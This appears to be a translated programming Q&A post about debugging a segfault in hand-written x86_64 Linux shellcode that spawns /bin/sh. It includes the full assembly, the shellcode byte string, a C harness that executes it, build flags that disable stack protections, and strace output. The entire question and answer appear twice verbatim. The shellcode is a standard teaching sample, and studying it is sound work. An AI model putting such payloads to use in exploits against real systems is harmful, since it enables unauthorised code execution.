在 Linux x86_64 汇编中生成 shell
spawning a shell in linux x86_64 assembly
我正在尝试编写一段 shellcode,用 Linux x86_64 汇编生成一个“/bin/sh” shell。当我把它直接作为可执行文件运行时,它工作得很好。问题是,当我把代码的机器码字节转储出来并作为字符串放置(见下面的 C 代码)时,出现了错误:
'segmentation fault: core dumped '
;-----------------------------------------------------------------------
; _start: execve("/bin//sh", NULL, NULL)
; Target: Linux x86-64, raw syscall interface (no libc, no data section).
; The pathname is built on the stack rather than referenced from .rodata,
; so the code has no absolute address in it and can be copied as bytes.
; Registers at the syscall: rax = 59 (execve), rdi = pathname,
; rsi = argv = NULL, rdx = envp = NULL.
; Clobbers: rax, rdi, rsi, rdx, flags; the syscall itself clobbers rcx, r11.
; Stack: 16 bytes pushed (path qword + NUL qword), never popped.
; There is no code after the syscall: on success execve never returns;
; on failure execution falls through into whatever bytes follow, so a
; real program would check rax and add an exit path.
;-----------------------------------------------------------------------
global _start
section .text
_start:
push 59 ;sys_execve: rax = __NR_execve (59) via a 3-byte push imm8 / pop pair
pop rax
xor rdi, rdi ;rdi = 0
push rdi ;eight zero bytes: the NUL terminator that will follow the path
mov rdi, 0x68732F2f6e69622F ;/bin//sh in reverse: little-endian, so in memory the bytes read "/bin//sh" (the doubled slash pads to exactly 8 bytes; path resolution ignores it)
push rdi ;path qword now on the stack, immediately followed by the NUL qword
mov rdi, rsp ;pointer to the /bin//sh -> 1st syscall arg, pathname
xor rsi, rsi ;NULL -> 2nd arg, argv
xor rdx, rdx ;NULL -> 3rd arg, envp
syscall ;execve(rdi, rsi, rdx); replaces the process image on success
包含该 shellcode 字节串的 C 代码:
#include <stdio.h>
/* Machine code of the _start listing above as a byte string. The bytes
 * decode to: push 59 / pop rax / xor rdi,rdi / push rdi / mov rdi,imm64
 * ("/bin//sh") / push rdi / mov rdi,rsp / xor rsi,rsi / xor rdx,rdx /
 * syscall. The trailing ' ' (0x20) after \x0f\x05 is a stray byte that is
 * only reached if execve returns, i.e. fails. sh[] lives in the writable
 * .data section, so jumping into it requires those pages to be executable;
 * the build below relies on gcc's -z execstack for that. */
char sh[]="\x6a\x3b\x58\x48\x31\xff\x57\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x0f\x05 ";
/* Test harness: jumps into sh[] as if it were a function.
 * Nonstandard: C requires main to return int; gcc accepts "void main"
 * as an extension. argc and argv are unused. */
void main(int argc, char **argv)
{
int (*func)();          /* pointer to a function with unspecified parameters */
func = (int (*)()) sh;  /* data pointer -> function pointer: not portable C, relies on a flat address space */
(int)(*func)();         /* the (int) cast on a discarded result is a no-op; never returns if execve succeeds */
}
我用来生成 shellcode 的命令:
# Assemble to a 64-bit ELF object, then link that single object with ld
# (no libc, no -l flags): the result is the freestanding ./shellcode binary.
nasm -felf64 shellcode.nasm -o shellcode.o
ld shellcode.o -o shellcode
我用来构建所利用程序的命令:
# -fno-stack-protector disables the stack canary; -z execstack marks the
# GNU_STACK segment executable. There is no -o, so the output is ./a.out,
# not ./shellcode (which is the NASM + ld binary built above).
gcc -fno-stack-protector -z execstack shellcode.c
strace ./shellcode 的输出:
execve("./shellcode", ["./shellcode"], 0x7ffe19f431f0 /* 59 vars */) = 0
brk(NULL) = 0x5651f32c3000
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=96319, ...}) = 0
mmap(NULL, 96319, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7ff0d7a8d000
close(3) = 0
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "7ELF[=17=][=17=][=17=][=17=][=17=][=17=][=17=][=17=][=17=]>[=17=][=17=][=17=][=17=]0[=17=][=17=][=17=][=17=][=17=]"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=2030544, ...}) = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ff0d7a8b000
mmap(NULL, 4131552, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7ff0d748d000
mprotect(0x7ff0d7674000, 2097152, PROT_NONE) = 0
mmap(0x7ff0d7874000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1e7000) = 0x7ff0d7874000
mmap(0x7ff0d787a000, 15072, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7ff0d787a000
close(3) = 0
arch_prctl(ARCH_SET_FS, 0x7ff0d7a8c4c0) = 0
mprotect(0x7ff0d7874000, 16384, PROT_READ) = 0
mprotect(0x5651f168d000, 4096, PROT_READ) = 0
mprotect(0x7ff0d7aa5000, 4096, PROT_READ) = 0
munmap(0x7ff0d7a8d000, 96319) = 0
--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_ACCERR, si_addr=0x5651f168e020} ---
+++ killed by SIGSEGV (core dumped) +++
Segmentation fault (core dumped)
gcc -fno-stack-protector -z execstack shellcode.c
不会创建名为 shellcode 的文件,而是创建 a.out,因为你没有使用 -o。
因此,运行 strace ./shellcode 实际运行的是您用 NASM + ld 生成的二进制文件。但是您显示的 strace 输出与静态可执行文件不匹配(它加载了 libc.so.6),很可能来自您之前某次忘记加 -z execstack 的 gcc 调用。
请运行 strace ./a.out,以运行您用 gcc 从当前版本源代码构建出的文件。
如果您给 execve 传了错误的参数,strace 会显示它返回 -EFAULT。但输出中没有这种情况,这可能意味着您运行的可执行文件试图跳转到不可执行的页面(SIGSEGV 的 si_code 为 SEGV_ACCERR),这与没有加 -z execstack 构建的二进制文件完全吻合。
我正在尝试编写一段 shellcode,用 Linux x86_64 汇编生成一个“/bin/sh” shell。当我把它直接作为可执行文件运行时,它工作得很好。问题是,当我把代码的机器码字节转储出来并作为字符串放置(见下面的 C 代码)时,出现了错误:
'segmentation fault: core dumped '
;-----------------------------------------------------------------------
; _start: execve("/bin//sh", NULL, NULL)
; Target: Linux x86-64, raw syscall interface (no libc, no data section).
; The pathname is built on the stack rather than referenced from .rodata,
; so the code has no absolute address in it and can be copied as bytes.
; Registers at the syscall: rax = 59 (execve), rdi = pathname,
; rsi = argv = NULL, rdx = envp = NULL.
; Clobbers: rax, rdi, rsi, rdx, flags; the syscall itself clobbers rcx, r11.
; Stack: 16 bytes pushed (path qword + NUL qword), never popped.
; There is no code after the syscall: on success execve never returns;
; on failure execution falls through into whatever bytes follow, so a
; real program would check rax and add an exit path.
;-----------------------------------------------------------------------
global _start
section .text
_start:
push 59 ;sys_execve: rax = __NR_execve (59) via a 3-byte push imm8 / pop pair
pop rax
xor rdi, rdi ;rdi = 0
push rdi ;eight zero bytes: the NUL terminator that will follow the path
mov rdi, 0x68732F2f6e69622F ;/bin//sh in reverse: little-endian, so in memory the bytes read "/bin//sh" (the doubled slash pads to exactly 8 bytes; path resolution ignores it)
push rdi ;path qword now on the stack, immediately followed by the NUL qword
mov rdi, rsp ;pointer to the /bin//sh -> 1st syscall arg, pathname
xor rsi, rsi ;NULL -> 2nd arg, argv
xor rdx, rdx ;NULL -> 3rd arg, envp
syscall ;execve(rdi, rsi, rdx); replaces the process image on success
包含该 shellcode 字节串的 C 代码:
#include <stdio.h>
/* Machine code of the _start listing above as a byte string. The bytes
 * decode to: push 59 / pop rax / xor rdi,rdi / push rdi / mov rdi,imm64
 * ("/bin//sh") / push rdi / mov rdi,rsp / xor rsi,rsi / xor rdx,rdx /
 * syscall. The trailing ' ' (0x20) after \x0f\x05 is a stray byte that is
 * only reached if execve returns, i.e. fails. sh[] lives in the writable
 * .data section, so jumping into it requires those pages to be executable;
 * the build below relies on gcc's -z execstack for that. */
char sh[]="\x6a\x3b\x58\x48\x31\xff\x57\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x0f\x05 ";
/* Test harness: jumps into sh[] as if it were a function.
 * Nonstandard: C requires main to return int; gcc accepts "void main"
 * as an extension. argc and argv are unused. */
void main(int argc, char **argv)
{
int (*func)();          /* pointer to a function with unspecified parameters */
func = (int (*)()) sh;  /* data pointer -> function pointer: not portable C, relies on a flat address space */
(int)(*func)();         /* the (int) cast on a discarded result is a no-op; never returns if execve succeeds */
}
我用来生成 shellcode 的命令:
# Assemble to a 64-bit ELF object, then link that single object with ld
# (no libc, no -l flags): the result is the freestanding ./shellcode binary.
nasm -felf64 shellcode.nasm -o shellcode.o
ld shellcode.o -o shellcode
我用来构建所利用程序的命令:
# -fno-stack-protector disables the stack canary; -z execstack marks the
# GNU_STACK segment executable. There is no -o, so the output is ./a.out,
# not ./shellcode (which is the NASM + ld binary built above).
gcc -fno-stack-protector -z execstack shellcode.c
strace ./shellcode 的输出:
execve("./shellcode", ["./shellcode"], 0x7ffe19f431f0 /* 59 vars */) = 0
brk(NULL) = 0x5651f32c3000
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=96319, ...}) = 0
mmap(NULL, 96319, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7ff0d7a8d000
close(3) = 0
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "7ELF[=17=][=17=][=17=][=17=][=17=][=17=][=17=][=17=][=17=]>[=17=][=17=][=17=][=17=]0[=17=][=17=][=17=][=17=][=17=]"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=2030544, ...}) = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ff0d7a8b000
mmap(NULL, 4131552, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7ff0d748d000
mprotect(0x7ff0d7674000, 2097152, PROT_NONE) = 0
mmap(0x7ff0d7874000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1e7000) = 0x7ff0d7874000
mmap(0x7ff0d787a000, 15072, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7ff0d787a000
close(3) = 0
arch_prctl(ARCH_SET_FS, 0x7ff0d7a8c4c0) = 0
mprotect(0x7ff0d7874000, 16384, PROT_READ) = 0
mprotect(0x5651f168d000, 4096, PROT_READ) = 0
mprotect(0x7ff0d7aa5000, 4096, PROT_READ) = 0
munmap(0x7ff0d7a8d000, 96319) = 0
--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_ACCERR, si_addr=0x5651f168e020} ---
+++ killed by SIGSEGV (core dumped) +++
Segmentation fault (core dumped)
gcc -fno-stack-protector -z execstack shellcode.c
不会创建名为 shellcode 的文件,而是创建 a.out,因为你没有使用 -o。
因此,运行 strace ./shellcode 实际运行的是您用 NASM + ld 生成的二进制文件。但是您显示的 strace 输出与静态可执行文件不匹配(它加载了 libc.so.6),很可能来自您之前某次忘记加 -z execstack 的 gcc 调用。
请运行 strace ./a.out,以运行您用 gcc 从当前版本源代码构建出的文件。
如果您给 execve 传了错误的参数,strace 会显示它返回 -EFAULT。但输出中没有这种情况,这可能意味着您运行的可执行文件试图跳转到不可执行的页面(SIGSEGV 的 si_code 为 SEGV_ACCERR),这与没有加 -z execstack 构建的二进制文件完全吻合。